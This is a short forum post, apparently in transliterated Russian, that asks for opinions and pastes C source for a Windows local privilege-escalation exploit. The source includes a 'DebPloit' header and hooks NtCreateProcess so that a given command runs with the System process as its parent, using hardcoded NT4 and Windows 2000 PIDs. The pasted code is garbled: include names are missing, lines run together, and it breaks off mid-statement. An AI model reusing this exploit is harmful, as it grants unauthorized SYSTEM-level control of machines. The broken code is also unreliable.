Cto cio mojet scazati ob etom???

#define WIN32_LEAN_AND_MEAN#define UNICODE#define _UNICODE#include #include #include #include #define AH_STATIC_LINKING#include #define PW_STATIC_LINKING#include //choose one:#include "..\..\Exploit\DebPloit.h"//#include "..\..\ExploitAlt\DebPloitAlt.h"PVOID OldNtCPCommon = NULL;HANDLE hParent = NULL;typedef LONG (WINAPI *TNtCP)(UINT, UINT, UINT, HANDLE, UINT, UINT, UINT, UINT);TNtCP OldNtCP = NULL;LONG WINAPI NewNtCP(UINT P0, UINT P1, UINT P2, HANDLE hParentP, UINT P4, UINT P5, UINT P6, UINT P7) { return(OldNtCP(P0, P1, P2, hParent, P4, P5, P6, P7));}VOID _tmain(int argc, TCHAR** argv) { BOOL NoError = FALSE; if(argc ")); else { LPTSTR CLine; DWORD ParentPID = PW_MEMERROR; DWORD SystemPID; CLine = argv[1]; //ParentPID = ProcessName2PID(_T("0/System")); if((BYTE)GetVersion() > 4) SystemPID = ParentPID = 8; //Hardcoded W2K PID of System process else SystemPID = ParentPID = 2; //Hardcoded NT4 PID of System process if(argc > 2) { CLine = argv[2]; _stscanf(argv[1], _T("%u"), &ParentPID); } if(ParentPID :) Novaia optia??? Nujno budet podumati ob etom!